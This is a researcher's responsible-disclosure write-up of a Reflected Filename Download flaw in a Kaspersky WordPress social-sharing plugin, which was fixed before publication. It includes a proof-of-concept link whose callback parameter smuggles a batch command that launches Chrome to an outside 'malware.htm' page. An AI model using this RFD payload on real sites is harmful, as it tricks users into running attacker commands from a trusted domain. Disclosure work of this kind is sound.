Kaspersky Social Sharing WordPress Plugin RFD

WS201507 – Kaspersky Social Sharing WordPress Plugin RFD
by David Sopas @dsopas
www.websegura.net

Description:

While visiting securelist.com I noticed a request to a application/json file that could be manipulated using RFD – Reflected Filename Download.

http://securelist.com/wp-content/plugins/kaspersky-social-sharing/counter/index.php?url=http://www.websegura.net&callback=json[RFD Attack]

It was a WordPress Plugin used by many sites of Kaspersky.
Due to the fact that filename couldn’t be controlled I used HTML5 vector to do it [supported by latest versions of Chrome, Opera, Android Browser and Chrome for Android].

So if you had this HTML code on a page you controlled:

<a download="Setup.bat" src="http://securelist.com/wp-content/plugins/kaspersky-social-sharing/counter/index.php?url=http://www.websegura.net&callback=json||start%20chrome%20websegura.net/malware.htm||">Download Kaspersky for Free</a>

It would launch the attack. When the user clicked on the download link it would get a file supposed to be on Securelist.com [a trusted domain]. After running the batch file it would run Google Chrome with a site [which I simulated with my own site with only text].

securelist_screen

Kaspersky replied to my alert very fast and showed me that they really care about security of their clients:

The issue is fixed across our blogs
We have pushed a fix to the upstream to fix it on other, non-KL blogs

I also want to thank Kaspersky for sending me a gift pack and being the FIRST company to have their name on our Thanks list.

Timeline:
12 Mar 2015 – Reported to Kaspersky
17 Mar 2015 – Kaspersky replied that everything is patched
20 Mar 2015 – Received a gift from Kaspersky
23 Mar 2015 – Full disclosure

Achaste interessante? Partilha!